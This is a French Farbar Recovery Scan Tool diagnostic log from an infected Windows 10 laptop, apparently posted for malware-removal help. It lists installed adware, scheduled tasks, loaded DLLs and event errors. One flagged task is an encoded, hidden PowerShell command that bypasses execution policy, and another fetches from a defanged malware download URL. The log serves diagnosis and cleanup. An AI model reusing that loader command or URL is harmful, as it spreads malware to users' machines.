Format du document : text/plain
Prévisualisation
Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 29-10-2016
Exécuté par UTILISATEUR (30-10-2016 13:24:57)
Exécuté depuis C:\Users\UTILISATEUR\Desktop
Windows 10 Pro Version 1511 (X64) (2016-01-26 16:44:38)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-2287989973-3124673205-43519314-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2287989973-3124673205-43519314-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2287989973-3124673205-43519314-1002 - Limited - Enabled)
Invité (S-1-5-21-2287989973-3124673205-43519314-501 - Limited - Disabled)
UTILISATEUR (S-1-5-21-2287989973-3124673205-43519314-1000 - Administrator - Enabled) => C:\Users\UTILISATEUR
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Adobe Reader X (10.1.8) - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AA1000000001}) (Version: 10.1.8 - Adobe Systems Incorporated)
Caster (HKLM\...\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}) (Version: 1.0 - Caster) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.71 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
HDWallPaper 1.0 (HKLM-x32\...\HDWallPaper_is1) (Version: 1.0.0.76 - HDWallPaper) <==== ATTENTION
host version 1.1 (HKLM-x32\...\host_is1) (Version: 1.1 - Wizzlabs) <==== ATTENTION
Microsoft Office Professionnel Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{2af972c7-13b0-4978-92a8-fee26a4fb4e9}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation)
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 3.0.3.4 - Ross Che) <==== ATTENTION
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
StreamOptimizer (HKU\S-1-5-21-2287989973-3124673205-43519314-1000\...\StreamOptimizer) (Version: - ) <==== ATTENTION
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.65452 - TeamViewer)
The Sims 4 (HKLM-x32\...\The Sims 4_R.G. Mechanics_is1) (Version: - R.G. Mechanics, ProZorg_tm)
The Sims 4 Update 1.0.797.20 (HKLM-x32\...\VGhlU2ltczQ=_is1) (Version: 1 - )
Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{90150000-012B-040C-0000-0000000FF1CE}_Office15.PROPLUS_{8D97B9A2-D73D-4CB6-9D1F-D25178AC4EDE}) (Version: - Microsoft)
VAIO Care (HKLM-x32\...\{36C5BBF0-E5BF-4DE1-B684-7E90B0C93FB5}) (Version: 6.2.2.07150 - Sony Corporation)
VAIO Care (x32 Version: 6.2.2.07150 - Sony Corporation) Hidden
VAIO Control Center (HKLM-x32\...\{72042FA6-5609-489F-A8EA-3C2DD650F667}) (Version: 4.3.0.05310 - Sony Corporation)
VAIO Smart Network (HKLM-x32\...\{0899D75A-C2FC-42EA-A702-5B9A5F24EAD5}) (Version: 3.3.0.06080 - Sony Corporation)
VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 6.3.0.08010 - Sony Corporation)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden
ZHPFix 2015 (HKLM-x32\...\ZHPFix_is1) (Version: 2015 - Nicolas Coolman)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-2287989973-3124673205-43519314-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\UTILISATEUR\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe => Pas de fichie (l'élément de données a 1 caractères en plus).
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {010279AC-0657-4AA4-8F38-E7C1645FB23A} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {02D3D0C2-3153-4B23-ADFF-481C7B052601} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {03E72698-02E7-4300-8BBC-6A68EC02D898} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {0686C3B2-17BC-4F9E-B065-769B54D2F311} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {08F72429-B7A4-4ABA-94A4-6F158515AA75} - System32\Tasks\SONY\VAIO Power Management\VPM Logon Start => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {09A97695-D5E5-4ADB-939F-A0CC5CEF08EB} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {126C6886-AE2A-45C5-86FE-074024AABD21} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1803D312-FBF2-4DDB-8AC5-FA9B07D4D5FD} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {1CBBAA39-7FC4-4EBD-9A4E-3998B2757FF6} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-03] (Google Inc.)
Task: {242A605A-FBB5-46C4-B8D1-77606088F201} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2C3EB428-2841-4C66-B25C-6BDA69F289A1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {347586A3-C7C4-4CCB-B368-3CCFB29BD992} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {3EDE5D92-0F59-43D9-8F29-D6B5181A6A74} - System32\Tasks\{7A0C0447-080E-0F7D-0E11-0C040E0F1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAA7ACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0A (l'élément de données a 9904 caractères en plus). <==== ATTENTION
Task: {48AA1071-3144-480E-A693-C3F30A7986E0} - System32\Tasks\VAIO Care => C:\Program Files\Sony\VAIO Care\VCsystray.exe [2010-07-15] (Sony Corporation)
Task: {4DC80ABE-FC93-4FEC-A1E5-03E4FDFF448A} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {51BC8B40-C5E4-42F1-B5E9-6DB3D92B0B9D} - System32\Tasks\PPI Update => "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ATTENTION
Task: {67D092A2-D777-462A-B316-D4F878433D54} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6EBD342D-1318-416B-9261-F842C1AC0B3D} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {6F09CAF5-7370-4679-B6E3-7474EC35E8C1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {735E7D32-3023-4B5B-AE13-53FB10554791} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {7F28CF12-2EA0-4BBA-8432-EF1A2AC87643} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {8023A701-82FB-4D13-9F98-5B50534F9CE0} - System32\Tasks\Anoduty Controls => C:\Program Files (x86)\Aromocult\wgerse.exe [2016-09-05] (Kunshan Aunbox software co.,Ltd)
Task: {8083EBBA-7CE7-4666-B5F1-04E6E4F228B0} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {841D4962-3426-43AB-9E9D-744AC251D214} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {8575D586-D63F-4411-94AB-5D89BFAAA031} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {864E81B4-EF47-4F52-B7A5-AFDE73405643} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {865AE22C-11FB-43A0-BEC3-7A444F0C66F7} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {8A719FBE-D148-4B5D-9B26-612846DF6367} - System32\Tasks\SONY\VAIO Power Management\VPM Session Change => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {8CA0E780-C343-481A-9AE8-EF2A9F2D63C3} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2013-08-01] (Sony Corporation)
Task: {964DE4F1-CD17-4666-84A4-F376E6AB5C06} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {992216CE-6670-4911-BD09-17535EFFDD70} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {9B6AB752-D045-498D-82E5-107B17C37543} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {AA6DD1E0-40C0-409E-BA35-64EB4E582A48} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD412A9E-A675-4EF7-9BE9-5DB5DD00E2C7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {AD9C75F4-4F0E-4041-9097-3CACFBC7FD76} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-03] (Google Inc.)
Task: {B0F9F860-3143-4B5A-A404-5CC97D1191E4} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update Self Ultimate Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2013-08-01] (Sony Corporation)
Task: {B5BA8A02-5699-47E2-A26B-DE2AC3D8F71D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {B6D89ABA-446A-4EFA-896A-684CDE368156} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {BCAC2235-6630-4B31-BF95-CBF39645A1BE} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C1167FD2-67B9-463E-B893-0B4BA8A1ACBC} - System32\Tasks\VAIO Care Support => C:\Program Files\Sony\VAIO Care\VCSpt.exe [2010-05-26] (Sony Corporation)
Task: {C3A61E2A-6C14-4548-A79F-508E59F16F19} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {C5392E41-ACF9-409A-A646-B7D9E9ABC516} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DC1D709B-B5BB-4D12-B6C7-2FC12ECC073E} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {E47195BC-7511-4FA5-B561-37D9021BCE05} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {EB3C16D0-1F55-4A87-AA25-79C4FD573892} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-03] (Adobe Systems Incorporated)
Task: {EE5B9E00-723C-45ED-892A-D71BC630675A} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {EF508A0F-E91E-41B7-90C1-86316E5B048B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F0E160E7-26E3-4268-A7F7-FF59B24EF4CC} - System32\Tasks\SONY\VAIO Power Management\VPM Unlock => C:\Program Files\Sony\VAIO Power Management\SPMgr.exe [2010-06-21] (Sony Corporation)
Task: {F2A5FF22-BCE8-45FB-A23F-208E034E2F11} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {F4E11582-6A47-4E33-A7B7-462A4B49C2D8} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Raccourcis =============================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
ShortcutWithArgument: C:\Users\UTILISATEUR\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\UTILISATEUR\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
==================== Modules chargés (Avec liste blanche) ==============
2016-10-13 12:59 - 2016-10-28 11:14 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Program Files (x86)\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Program Files (x86)_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.3\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.3_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.4\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.4_\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.5\local64spl.dll
2016-09-06 01:52 - 2016-09-06 01:52 - 00142336 ____H () C:\Users\MS.Default\Helper.5_\local64spl.dll
2016-10-13 12:59 - 2016-10-13 12:59 - 00470592 _____ () C:\WINDOWS\SysWOW64\NetUtils2016.exe
2016-05-05 11:16 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-05-05 11:16 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-01-27 22:51 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-12 12:21 - 2016-04-23 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-12 12:22 - 2016-04-23 05:02 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-05-12 12:22 - 2016-04-23 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-05-12 12:22 - 2016-04-23 04:58 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-05-12 12:23 - 2016-04-23 05:01 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-11-26 22:54 - 2012-11-26 22:54 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-09-05 21:50 - 2016-09-05 21:50 - 00544256 _____ () c:\program files (x86)\aromocult\chcndf.dll
2012-08-24 16:04 - 2010-05-31 18:18 - 00013824 _____ () C:\Program Files (x86)\Sony\VAIO Event Service\VESBasePS.dll
2012-08-24 16:04 - 2010-05-31 18:18 - 00013312 _____ () C:\Program Files (x86)\Sony\VAIO Event Service\VESMgrSubPS.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-05-05 12:08 - 2016-05-05 12:09 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-09-05 21:50 - 2016-09-05 21:50 - 00233984 _____ () C:\Users\UTILISATEUR\AppData\Local\iklado.dll
2016-08-11 14:04 - 2016-08-11 14:04 - 00258560 _____ () C:\Users\UTILISATEUR\AppData\Roaming\Geunfy\Yurejjaeb.dll
2016-08-11 14:49 - 2016-08-11 14:49 - 00258560 _____ () C:\Users\UTILISATEUR\AppData\Roaming\Nuidereg\Gojko.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdwfp => ""="Driver"
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
==================== Hosts contenu: ==========================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2009-07-14 03:34 - 2016-10-26 12:39 - 00001640 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-2287989973-3124673205-43519314-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\UTILISATEUR\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{d2f21b8e-97da-438a-a0e6-fb38c2b1a66f}.jpg
DNS Servers: 104.197.191.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{4512F0D1-8D57-45B1-B155-3F1692AA6680}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{46CCEA0F-35CF-47F7-B979-78175F7DDAC2}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{1DA12D6A-DF96-4377-B72E-B8DE81415043}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{D3F6ADA5-C99B-4EDD-A413-E5CC2C39C3DA}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{0F441E4C-A9D2-4B31-850F-84D0A5AFF1C4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{88EFBDC3-1A50-471B-93F8-B9BF504B673B}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{16A57E88-BDA0-45F2-9DD6-A1358D92B449}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{91D7D610-C40C-4A0C-B32E-E884A8B21316}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6BDA8F8D-3A78-4FBC-9259-748C75D13890}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{1B73BF64-5408-4417-8C3B-8FA0EE69F23D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{DBB0BB13-3F3C-4C85-8181-DB26D76EAC36}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{2B4D922E-0BA3-4F81-9B63-41030B08559B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{D8A7045E-0C98-453F-BDAC-51A50236CB08}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{E7B48DB4-B684-4D9E-8CED-5A08CF4ADAB0}] => (Allow) LPort=1688
FirewallRules: [{72F7E7E5-FD5F-4C4E-A35A-CBB5ED32D63E}] => (Allow) LPort=1688
FirewallRules: [{0A1C93E6-0DBB-4108-81E9-839B189EA9A8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Points de restauration =========================
05-09-2016 19:34:54 Windows Update
18-10-2016 20:39:41 Point de contrôle planifié
26-10-2016 13:43:21 Point de contrôle planifié
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (10/30/2016 01:13:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.Windows.Photos_8wekyb3d8bbwe!App avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/30/2016 01:13:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme Microsoft.Photos.exe version 1.0.1607.22006 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance.
ID de processus : 1eb0
Heure de début : 01d232a6c75174ac
Heure de fin : 4294967295
Chemin d'accès de l'application : C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
ID de rapport : 4ac09cf6-9e9a-11e6-8d88-f0bf970e8634
Nom complet du package défaillant : Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe
ID de l'application relative au package défaillant : App
Error: (10/30/2016 01:11:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.Windows.Photos_8wekyb3d8bbwe!App avec l’erreur : -2144927141 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary zdwfp.
System Error:
Le fichier spécifié est introuvable.
.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.
System Error:
Accès refusé.
.
Error: (10/26/2016 01:43:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary cherimoya.
System Error:
Le fichier spécifié est introuvable.
.
Error: (10/26/2016 12:16:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante Service_KMS.exe, version : 13.2.0.0, horodatage : 0x53a73868
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0x00000000
Décalage d’erreur : 0x00007ff8442b0668
ID du processus défaillant : 0x9b0
Heure de début de l’application défaillante : 0x01d22f79d286bcb0
